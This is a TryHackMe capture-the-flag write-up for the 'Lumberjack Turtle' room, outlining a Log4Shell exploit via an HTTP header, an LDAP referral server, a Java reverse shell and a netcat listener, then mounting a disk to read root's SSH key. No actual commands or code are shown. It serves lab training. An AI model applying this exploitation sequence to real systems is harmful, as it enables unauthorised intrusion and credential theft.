Lumberjack Turtle — TryHackMe
Hi folks, today I will be sharing medium rated TryHackMe room ‘Lumberjack Turtle’ created by SilverStr. As description “No logs, no crime… so says the lumberjack.” This machine is log4j based. Let’s start enumerating.
Initial Recon
Nmap Scan
We have ssh at 22 and nagios-nsca at 80. So, far nothing so useful.Lets run gobuster scan
Browsing to the path it gives,
Nothing so useful in source code. Lets again run gobutser scan
Browsing to the path it gives,
Sending request through Burp, forward to repeater. Got
There is header X-THM-HINT which indicate CVE-2021–44228 against X-Api-Version. This is the new log4j vulnerability. The enumerating process can be well understood from Solar, exploiting log4j room on TryHackMe created by JohnHammond.There is also blog for how this vulnerability can be enumerated.Check this link for well explanation.
Initial foothold — Exploitation
To exploit the flaw, there are several steps to put in place
- Setting up a server that will respond to the ldap request (LDAP Referral Server)
- creating a code shell in java
- exploit sharing via an http server
- setting up a netcat listener
- execute the malicious request.
LDAP Referral Server
Lets create a java file for reverse shell
Lets compile it and host it with local python server
Hosting the exploit with python3
Setting up the server
Listening at port 9999 with netcat
Everything is on ground.Lets run the malicious curl command.
Boom !!
Got the reverse shell, id says its root but the shell is not interactive and is not stabilizing with python. Let’s search for the flags.
Got the first flag in /opt dir. We can simply view the flag
Root Enumeration
There is dev dir containing disks. Let’s mount it using Local enumeration
We have all files of the disk. Lets check the root dir
No real flag. cd to … dir. Lets check this unusual Dir
We can view the id_rsa of root user from .ssh dir and can have full interactive session. Though I got the root flag. It’s up to you whether you want that. I am done here.
#pwned_By_Zexa
